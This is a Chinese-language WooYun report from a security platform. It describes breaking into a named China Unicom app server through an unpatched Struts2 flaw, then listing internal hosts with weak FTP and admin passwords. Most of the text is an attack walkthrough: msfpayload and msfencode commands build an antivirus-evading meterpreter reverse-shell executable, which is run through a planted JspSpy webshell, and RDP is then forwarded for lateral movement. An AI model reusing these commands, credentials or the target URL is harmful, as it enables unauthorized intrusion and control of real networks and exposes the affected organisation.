WooYun.org

在肉肉提交的漏洞中
http://wooyun.org/bugs/wooyun-2015-0124160
提到了那个app，我也下载了，反编译一下，下面的网站依旧没有修复struts2漏洞

http://ttluniappserver.unicomlabs.com:8088/ServerCU/clientUpdate!askUpgrade.unicom

得到shell，习惯性在里面翻了一下，看到了这个，hscan，看来已经被翻过好几次了

下载了report文件，看到也没有扫出来什么内容最多就是ftp弱口令三个

10.1.80.41 ftp/[email protected]
10.1.80.5  admin/123456
10.1.17.252 admin/admin

之后想着看能不能用metasploit获取meterpreter，然后就有了下面的内容。我也是小白，内容很基础，寻找了很久才从老外的视频中找到，我也是笨吧。
#1 准备工作
首先你需要设置路由器，在路由器端口转发处，加上kali系统的ip，将5566(映射到虚拟机中)

重启路由器，大功告成一部分了
#2 生成payload，与metasploit创建通道连接

msfpayload windows/meterpreter/reverse_tcp LHOST=你的ip（百度搜索ip出现的那个就是） LPORT=5566（任意，只要没冲突） x>/root/Desktop/11.exe
下面的是进行免杀编码的，我刚开始上传的都被杀掉了
msfpayload windows/meterpreter/reverse_tcp LHOST=你的ip LPORT=5566（同上） R | msfencode -e x86/shikata_ga_nai -c 1 -t exe -x /root/Desktop/11.exe -o /root/Desktop/12.exe

上传12.exe到c:/12.exe(我自己图方便)
下面进行设置

在上传的jspspy的命令执行中，输入生成12.exe的路径如：c:/12.exe,执行完运气好就可以获取连接

之后就可以进行内网渗透了
使用portfwd add -l 6666 -p 3389 -r 127.0.0.1
可以直接转发，进行远程登录
终端下执行 rdesktop 127.0.0.1:6666就可以了